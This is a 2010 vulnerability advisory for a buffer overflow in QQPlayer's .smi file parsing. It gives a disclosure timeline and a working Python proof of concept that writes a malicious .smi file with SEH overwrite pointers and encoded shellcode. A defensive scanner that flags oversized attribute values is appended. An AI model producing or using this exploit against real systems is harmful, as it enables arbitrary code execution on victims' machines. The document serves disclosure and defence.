QQplayer smi File Processing Buffer Overflow Vulnerability
By Lufeng Li of Neusoft Corporation
Vulnerable: QQPlayer <= 2.3.696.400p1
Vendor: Tencent Inc
1) Software Description:
QQPlayer is developed by Tencent Inc. It is a very popular universal multimedia player in China.
2) Details:
A buffer overflow vulnerability exists in QQPlayer's processing of .smi files. It allows remote attackers to execute arbitrary code via a long string in an .smi file.
3) Timeline:
2010.05.26 Vendor notified
2010.06.08 Vendor released a fixed version (QQPlayer 2.4.716.400p1)
2010.07.26 Advisory released
4) Exploit:
#!/usr/bin/env python
#################################################################
# Proof of concept: writes a malformed .smi file (poc.smi).
# Written for Python 2, where str literals are byte strings, so the
# \x.. escapes below are emitted verbatim into the file.
#################################################################
# Start of the SMIL document; the "content" attribute of the second
# <meta> tag is deliberately left unterminated so the payload lands
# inside it.
head ='''<smil>
<head>
<meta name="title" content="_"/>
<meta name="author" content="Warner Music Group'''
# Filler that overruns the buffer up to the exception record.
junk = "A" * 2001
# Overwrites the next-SEH pointer.
nseh ="\x42\x61\x21\x61"
# Overwrites the SEH handler pointer (little-endian address).
seh ="\x39\x0c\x41\x00"
# Stack adjustment stub executed before the shellcode.
adjust="\x30\x83\xc0\x0b"
# Alphanumeric-encoded shellcode.
shellcode=("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPMYZEV"
"QN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWKRZPPRQGL"
"KQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9FFQKOVQO0NL9"
"QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN3LKS4LKC1XPMY1TW"
"TGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1LKROLGKON5OKZPNUORF6R"
"HOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE3512LSS6N3U2X3UUPDJA")
# Trailing padding after the shellcode.
junk_="R"*8000
# Closes the open attribute and the rest of the SMIL document.
foot ='''"/>
</head>
<body>
<seq>
<video src="rtsp://sos2208-1-rm.edgestreams.net/listeningparties/424444/.uid.MSAaAQCGwp9yU7mAOw6d182868f6d3c28b7f158b74fef576e1.424444_specialops.rm?
auth=caEdAc4dqaVcqbHcobOcGaVdaaOdXarcBat-bl.oeA-eS-HEGqpvyyvzDzssup&aifp=0001" title="_" author="Warner Music Group" copyright="2007 Rhino Entertainment"
fill="freeze"/>
</seq>
</body>
</smil>
<!-- Generated by Akamai Stream OS BOSS (v10.0.14-20100129) / d366992c -->'''
# Assemble the file contents and write them out.
payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot
fobj = open("poc.smi","w")
fobj.write(payload)
fobj.close()
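As an added, defender-side example that is not part of the advisory or its proof of concept: a small heuristic scanner that flags .smi files carrying the kind of overlong or binary-laden attribute value the Details section describes (the PoC above packs thousands of filler bytes plus raw address bytes into a single "content" attribute). The per-attribute ceiling MAX_ATTR_LEN is an assumption chosen for illustration, not a limit taken from QQPlayer, and the two sample files embedded in the block are constructed for the example rather than copied from the advisory.

```python
#!/usr/bin/env python3
"""Heuristic scanner for oversized or binary-laden attribute values in SMIL (.smi) files.

Added example; not part of the original advisory. Thresholds are assumptions.
"""
import re
from typing import List, Tuple

# Matches attr="value" or attr='value'. A value is everything up to the next
# matching quote, so an attribute padded with thousands of bytes is captured
# as one value and can be measured.
_ATTR_RE = re.compile(rb'''([A-Za-z_:][\w:.-]*)\s*=\s*(?:"([^"]*)"|'([^']*)')''')

# Assumed per-attribute ceiling: a title/author/content value of thousands of
# bytes has no legitimate use and matches the "long string" in the advisory.
MAX_ATTR_LEN = 512

Finding = Tuple[str, int, str]  # (attribute name, value length, reason)


def scan_smi(data: bytes, max_attr_len: int = MAX_ATTR_LEN) -> List[Finding]:
    """Return one finding per suspicious attribute value in a raw .smi file."""
    findings: List[Finding] = []
    for m in _ATTR_RE.finditer(data):
        name = m.group(1).decode("ascii", "replace")
        value = m.group(2) if m.group(2) is not None else m.group(3)
        if len(value) > max_attr_len:
            findings.append((name, len(value), "oversized attribute value"))
        # Control bytes other than tab/LF/CR never belong in a text attribute;
        # in the PoC they come from the embedded address and stub bytes.
        # High (>= 0x80) bytes are deliberately allowed: UTF-8 titles are legitimate.
        if any(b < 0x20 and b not in (0x09, 0x0A, 0x0D) for b in value) or 0x7F in value:
            findings.append((name, len(value), "control byte in attribute value"))
    return findings


def is_suspicious(data: bytes, max_attr_len: int = MAX_ATTR_LEN) -> bool:
    """True if the file should be quarantined or opened only in a sandbox."""
    return bool(scan_smi(data, max_attr_len))


# Constructed benign sample (not from the advisory).
BENIGN_SMI = b'''<smil>
<head>
<meta name="title" content="Demo clip"/>
<meta name="author" content="Example Author"/>
</head>
<body><seq><video src="demo.rm" title="Demo clip" fill="freeze"/></seq></body>
</smil>'''

# Constructed malformed sample (not the advisory's payload): one attribute
# padded far past any sane length and one carrying an embedded NUL byte.
MALFORMED_SMI = (b'<smil><head><meta name="author" content="' + b"A" * 3000 +
                 b'"/><meta name="title" content="x\x00y"/></head></smil>')


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SMI), ("malformed", MALFORMED_SMI)):
        verdict = "SUSPICIOUS" if is_suspicious(sample) else "clean"
        print(f"{label}: {verdict}")
        for name, length, reason in scan_smi(sample):
            print(f"  {reason}: attribute '{name}' ({length} bytes)")
```

The scanner is a triage aid for mail gateways or sandbox pre-filters, not a parser of the SMIL grammar: a file that defeats the attribute regex (for example by closing the quote early) is simply reported clean, so it complements rather than replaces patching to the fixed version.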